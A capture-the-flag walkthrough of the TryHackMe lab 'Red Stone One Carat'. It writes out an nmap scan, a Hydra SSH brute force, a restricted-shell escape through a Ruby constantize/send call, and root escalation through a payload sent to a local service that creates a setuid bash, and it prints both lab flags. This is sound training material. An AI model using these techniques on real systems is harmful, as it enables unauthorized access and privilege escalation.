The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.
While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
I'll give you a valuable source to find stuff related to Offensive Security using Ruby: https://rubyfu.net/....TryHackMe Red Stone One Carat
We start of my driving of tryhackme this room a quick scan on all ports using running nmap service scan to cover the top port...
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ sudo nmap -A -T4 -Pn -sV -vv -p- 10.10.221.171
[sudo] password for hackerboy:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-14 14:39 IST
NSE: Loaded 153 scripts for scanning.
Initiating NSE at 14:39
Nmap scan report for 10.10.221.171
Host is up, received user-set (0.28s latency).
Scanned at 2021-05-14 14:39:32 IST for 742s
Not shown: 65534 closed ports
Reason: 65534 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2e:8c:cf:37:0f:99:c9:2d:46:08:6b:52:3b:a8:28:8c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCp3zZeaCTMWxYy/DMUtf8SK/GSdrHS8qKlI6wePIFEB4mUCxzEWnJ2uu4+xFJoOwZ5RyoZPIr54suLINtGj1oL3tMO039HaQOPaZ10/vSQk7ynCyA300YUm8thcBGjqeM39O8qdeyhPL8COJ3a3jyOVOfOhnXGq94FLR+k1WTXA1vp3lROwPArr3cabXbOgxyeHiJKXo4UZqFulrkv5La4mnUs50293bfnRg96FHlmTfZVN326832+VirsGeMbdeKPP62UHpC7DRLE8Q7L4rUP2XIYMkJs4Llm381eb+L7rWUBG8oWS3MpIvqrmFoS2SnYa1qWgoyADTVfUJtZvETp
| 256 59:3e:40:48:4a:1a:cb:de:ad:d7:70:e8:fb:ca:82:c1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLFEm3SqL1hzvfyQjVs7LpYCbOw5bURoa0+t1T56flwOO0Ls2YeB6ANnuhLhuuw74uqsMleRNcsaAGKxQudRLWk=
| 256 4d:0d:ae:87:41:1d:14:5a:c0:6f:3d:c1:ed:7b:b6:d6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP1fljnhItb00uA6HXjmJSSN9E94e0WFFXO0PaL2TvYo
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/14%OT=22%CT=1%CU=34254%PV=Y%DS=2%DC=T%G=Y%TM=609E413
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=105%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M505ST11NW6%O2=M505ST11NW6%O3=M505NNT11NW6%O4=M505ST11NW6%O5=M505ST1
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 743.07 seconds
Raw packets sent: 74688 (3.290MB) | Rcvd: 70180 (2.835MB)
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$
But as soon as I saw the tryhackme hint I felt that I was going in the wrong direction, but maybe not now because first of all we will attack Brute Force with the wordlist file rockyou.txt and add it to a new file and it is called as password.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
└─$ grep bu /home/hackerboy/Documents/rockyou.txt > password.txt
grep: /home/hackerboy/Documents/rockyou.txt: binary file matches
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
└─$ ls
password.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
└─$ file password.txt
password.txt: UTF-8 Unicode text
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
└─$
So, now we will crack a password with password.txt file and the username is noraj that i got a tryhackme room...
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
└─$ hydra -l noraj -P password.txt ssh://10.10.28.121
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-14 17:24:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 126338 login tries (l:1/p:126338), ~7897 tries per task
[DATA] attacking ssh://10.10.28.121:22/
[STATUS] 177.00 tries/min, 177 tries in 00:01h, 126163 to do in 11:53h, 16 active
[22][ssh] host: 10.10.28.121 login: noraj password: cheeseburger
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-14 17:25:41
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
└─$ 255 ⨯
Now, after cracking let's access SSH via some credentials
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
└─$ ssh noraj@10.10.28.121
The authenticity of host '10.10.28.121 (10.10.28.121)' can't be established.
ECDSA key fingerprint is SHA256:SuMSHpQhKSw7AAbZmXq3aY/GOitfbGFUiIg2cTZFfOc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.28.121' (ECDSA) to the list of known hosts.
noraj@10.10.28.121's password:
red-stone-one-carat%
Now we have gone to an interpreter as you can see that any kind of command is not working here, so now I again went to the tryhackme room and saw that it was created with ruby programming.
Finally this command works..
pwd
echo *
echo .*
and some file appear here!!! Vola :-)
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
└─$ ssh noraj@10.10.28.121
red-stone-one-carat%
red-stone-one-carat% ls
zsh: command not found: ls
red-stone-one-carat% cd
cd: restricted
red-stone-one-carat% pwd
/home/noraj
red-stone-one-carat% echo *
bin user.txt
red-stone-one-carat% echo .*
.cache .hint.txt .zcompdump .zshrc
red-stone-one-carat% echo bin/*
bin/test.rb
red-stone-one-carat%
So, lets check other file via this command...and i saw ruby file here
echo bin/*
test.rb (file showing here)
You could transfer all the files you see with scp to your machine and read them there. But in this case, executing the file “test.rb” will print its contents:
red-stone-one-carat%
red-stone-one-carat% echo bin/*
bin/test.rb
red-stone-one-carat% test.rb
#!/usr/bin/ruby
require 'rails'
if ARGV.size == 3
klass = ARGV[0].constantize
obj = klass.send(ARGV[1].to_sym, ARGV[2])
else
puts File.read(__FILE__)
end
red-stone-one-carat%
After searching some stuff what this ruby code means, you can create a payload to start sh:
(After getting the shell, you have to reset the PATH variable):
Vola guys we got a user.txt (flag)
red-stone-one-carat%
red-stone-one-carat% test.rb Kernel 'system' "/bin/sh"
$ export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
$ /usr/lib/klibc/bin/cat user.txt
THM{3a106092635945849a0fbf7bac92409d}$
$
Next enumerate listening ports. Because netstat and ss are not allowed for the user noraj, you have to do netstat with some ruby code.
Transfer the ruby file first:
$
$ ls
bin user.txt
$ ls
bin netstat.rb user.txt
$
and with wget command download this file (netstat.rb) in our machine
and transfer it in victim machine via scp
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
└─$ wget https://gist.githubusercontent.com/kwilczynski/954046/raw/4571a1eed62c4f13d0a2c70c5cf5ebd45e41004e/netstat.rb
--2021-05-14 17:46:54-- https://gist.githubusercontent.com/kwilczynski/954046/raw/4571a1eed62c4f13d0a2c70c5cf5ebd45e41004e/netstat.rb
Resolving gist.githubusercontent.com (gist.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...
Connecting to gist.githubusercontent.com (gist.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1334 (1.3K) [text/plain]
Saving to: ‘netstat.rb’
netstat.rb 100%[===========================================================>] 1.30K --.-KB/s in 0s
2021-05-14 17:47:00 (14.2 MB/s) - ‘netstat.rb’ saved [1334/1334]
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
└─$ ls
netstat.rb password.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
└─$ scp netstat.rb noraj@10.10.28.121:~/netstat.rb
noraj@10.10.28.121's password:
netstat.rb 100% 1334 5.3KB/s 00:00
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
└─$
Then execute the transferred file:
$
$ ruby netstat.rb
0.0.0.0:22 0.0.0.0:0 LISTEN
127.0.0.1:31547 0.0.0.0:0 LISTEN
127.0.0.53:53 0.0.0.0:0 LISTEN
10.10.28.121:22 10.8.61.234:58296 ESTABLISHED
$
$ nc localhost 31547
$ exec %q!cp /bin/bash /tmp/bash; chmod +s /tmp/bash!
$
Connect to the service at port 31547 and bypass the blacklist to execute commands:
$
$ /tmp/bash -p
bash-4.4# id
uid=1001(noraj) gid=1001(noraj) euid=0(root) egid=0(root) groups=0(root),1001(noraj)
bash-4.4# whoami
root
bash-4.4# cat /root/root.txt
THM{58e53d1324eef6265fdb97b08ed9aadf}bash-4.4#
bash-4.4#
bash-4.4#
and finally we got a flag (root flag) :-)
Disclaimer
This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal ..!
All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.
All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.
- Hacking Truth by Kumar Atul Jaiswal
I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)